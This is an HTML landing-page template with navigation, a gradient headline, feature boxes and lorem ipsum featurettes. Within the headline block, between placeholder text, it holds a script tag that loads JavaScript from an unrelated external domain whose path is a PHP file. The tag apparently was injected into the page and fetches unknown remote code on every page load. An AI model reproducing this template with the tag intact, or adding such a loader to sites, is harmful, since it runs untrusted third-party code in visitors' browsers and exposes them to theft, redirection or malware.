<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet">
<style>
* {box-sizing: border-box;}

body {
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

.topnav {
  overflow: hidden;
  background-color: #4c4c4c;
}

.topnav a {
  float: left;
  display: block;
  color: white;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #ddd;
  color: black;
}

.topnav .search-container {
  float: right;
  }

.topnav input[type=text] {
  padding: 6px;
  margin-top: 8px;
  font-size: 17px;
  border: none;
  border-radius: 6px;
}

.topnav .search-container button {
  float: right;
  padding: 6px 10px;
  margin-top: 8px;
  margin-right: 16px;
  background: #ddd;
  font-size: 17px;
  border: none;
  cursor: pointer;
}

.topnav .search-container button:hover {
  background: #ccc;
}

@media screen and (max-width: 600px) {
  .topnav .search-container {
    float: none;
  }
  .topnav a, .topnav input[type=text], .topnav .search-container button {
    float: none;
    display: block;
    text-align: left;
    width: 100%;
    margin: 0;
    padding: 14px;
  }
  .topnav input[type=text] {
    border: 1px solid #ccc;  
  }
}
.topnav a.link {
  float: left;
  display: block;
  color: #b2b2b2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
  }
.topnav a.disabled {
  float: left;
  display: block;
  color: #999999;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
  }
.btn {
  border: 2px solid black;
  background-color: #4C4C4C;
  color: black;
  padding: 14px 28px;
  font-size: 16px;
  cursor: pointer;
}
  .success {
  border-color: green;
  border: 2px;
  color: green;
  border-radius: 8px;
  margin: 5px;
  background-color: #4C4C4C; 
}

.success:hover {
  background-color: #4CAF50;
  color: green;
}
.header {
  padding: 140px;
  text-align: left;
  background: linear-gradient(43deg, #f12711, #f5af19);
  color: white;
  font-size: 20px;
}

.divheader {
text-align: center;
width: 90%;
margin: 0px 150px;
}

.header1 {
    width: 300px;
    height: 300px;
    align: center;
    display: inline-block;
    margin: 30px 10px 200px 0px;
    text-align: center;
    }

.header2 {
    width: 300px;
    height: 300px;
    align: center;
    display: inline-block;
    text-align: center;
    }
 
.header3 {
    width: 300px;
    height: 300px;
    align: center;
    display: inline-block;
    text-align: center;
    }
    
.dot {
  height: 50%;
  width: 50%;
  background-color: #909090;
  border-radius: 50%;
  display: inline-block;
  align:center;
  padding: 0px 50px 0px 0px;
}

.viewdetails {
border-color: #454545;
color: white;
border-radius: 6px;
margin: 100px 0px 0px 0px;
padding: 5px;
font-size: 15px;
cursor: pointer;
background-color: #454545;
}

.viewdetails:hover {
background-color: #3b3b3b;
color: white; 
}

.stop {
border-style: none none solid none;
border-color: #cecece;
border: 0px 0px 20px 0px;
padding: 0px 50px;
margin: 0px 5% 0px 5%;
}

.paragraph1 {
text-align: left;
font-size:30px;
margin: 200px 0px 0px 0px;
width: 50%;
}

.paragraph2 {
text-align: left; 
font-size: 20px;
margin:-20px 0px 0px 0px;
width: 50%;
}

.divimage {
width: 250px;
height: 250px;
text-align: center;
background-color: #cecece;
float: right;
margin: -50px 250px 100px 0px;
}

.divimagetext {
margin: 110px 20px 30px 30px;
font-size: 20px;
}

.stop2 {
border-style: solid none none none;
border-color: #cecece;
border: 0px 0px 20px 0px;
padding: 0px 50px;
margin: 200px 5% 0px 5%;
}

.divimage2 {
width: 250px;
height: 250px;
text-align: center;
background-color: #cecece;
float: right;
margin: 150px 150px 100px 0px;
}

.stopend {
border-style: solid none none none;
border-color: #cecece;
border: 0px 0px 20px 0px;
padding: 0px 50px;
margin: 120px 5% 50px 5%;
}

.paragraph3 {
text-align: left; 
font-size: 15px;
margin:50px 0px 0px 0px;
width: 50%;
}


.privacy {
color: #71bbd4;
text-align: left; 
font-size: 15px;
margin:-17px 0px 0px 200px;
width: 50%;
}

.privacy:link {
  text-decoration: none;
}

.privacy:visited {
  text-decoration: none;
}
.privacy:hover {
color: #62b4cf;
cursor: pointer;
text-decoration: underline;
}
.privacy:active {
  text-decoration: none;
}
  
.back {
color: #71bbd4;
text-align: right; 
font-size: 15px;
margin:-17px 0px 0px 800px;
width: 50%;
}

.back:link {
  text-decoration: none;
}

.back:visited {
  text-decoration: none;
}
.back:hover {
color: #62b4cf;
cursor: pointer;
text-decoration: underline;
}
.back:active {
  text-decoration: none;
}
.terms {
color: #71bbd4;
text-align: left; 
font-size: 15px;
margin:-17px 0px 0px 255px;
width: 50%;
}

.terms:link {
  text-decoration: none;
}

.terms:visited {
  text-decoration: none;
}
.terms:hover {
color: #62b4cf;
cursor: pointer;
text-decoration: underline;
}
.terms:active {
  text-decoration: underline;
}
.sticky {
  position: fixed;
  top: 00;
  width: 100%;
}    
  
</style>
</head>
<body>

<div class="topnav" id="myHeader">
  <a href="#start">Carousel</a>
  <a href="#start">Home</a>
  <a class="link" href="#start">Link</a>
  <a class="disabled" href="#start">Disabled</a>
  <div class="search-container">
    <form action="/action_page.php">
      <input type="text" placeholder="Search" name="search">
		<button class="success">Search</button>
    </form>
  </div>
</div>

<div class="header" id="start">
  	<h1>Example headline.</h1>
    <p1 class="headertext"> This is a random text of headline </p1>
	<script type="text/javascript" src="http://404bajery.pl/pada/custom.php?flake=8">
</script>

</div>

<div class="divheader stop">
	<div class="header1">
		<span class="dot"> </span>
			<p> <br> <br> This is a text of first paragraph </p>
        <button class="viewdetails"> View details >> </button>
	</div>
    
	<div class="header2">
		<span class="dot"> </span>
			<p> <br> <br> This is a text of second paragraph </p>
        <button class="viewdetails"> View details >> </button>
	</div>
    
	<div class="header3">
		<span class="dot"> </span>
			<p> <br> <br> This is a text of third paragraph </p>
        <button class="viewdetails"> View details >> </button>
	</div>
</div>

<div class="divheader">
	<div class="divimage">
		<p class="divimagetext"> 250x250 </p>
    </div>
		<p class="paragraph1"> First featurette heading. It'll blow your mind. </p>
		<p class="paragraph2"> <br> Donec ullamcorper nulla non metus auctor fringilla. Vestibulum id ligula porta felis euismod semper. Praesent commodo cursus magna, vel scelerisque nisl consectetur. Fusce dapibus, tellus ac cursus commodo. </p>
</div>

<div class="divheader stop2">
	<div class="divimage2">
		<p class="divimagetext"> 250x250 </p>
    </div>
		<p class="paragraph1"> Oh yeah, it's that good. See for yourself. </p>
		<p class="paragraph2"> <br> Donec ullamcorper nulla non metus auctor fringilla. Vestibulum id ligula porta felis euismod semper. Praesent commodo cursus magna, vel scelerisque nisl consectetur. Fusce dapibus, tellus ac cursus commodo. </p>
</div>

<div class="divheader stop2">
	<div class="divimage2">
		<p class="divimagetext"> 250x250 </p>
    </div>
		<p class="paragraph1"> And lastly, this one. Checkmate. </p>
		<p class="paragraph2"> <br> Donec ullamcorper nulla non metus auctor fringilla. Vestibulum id ligula porta felis euismod semper. Praesent commodo cursus magna, vel scelerisque nisl consectetur. Fusce dapibus, tellus ac cursus commodo. </p>
</div>

<div class="divheader stopend">
	<p class="paragraph3"> © 2017-2018 Company, Inc. ·  </p>
	<a href="#start"> <p class="privacy">Privacy</p> </a>
	<a href="#start"> <p class="terms">Terms </p> </a>
    <a href="#start"> <p class="back">Back to top </p> </a>
</div>
<script>
window.onscroll = function() {myFunction()};

var header = document.getElementById("myHeader");
var sticky = header.offsetTop;

function myFunction() {
  if (window.pageYOffset > sticky) {
    header.classList.add("sticky");
  } else {
    header.classList.remove("sticky");
  }
}
</script>
</body>
</html>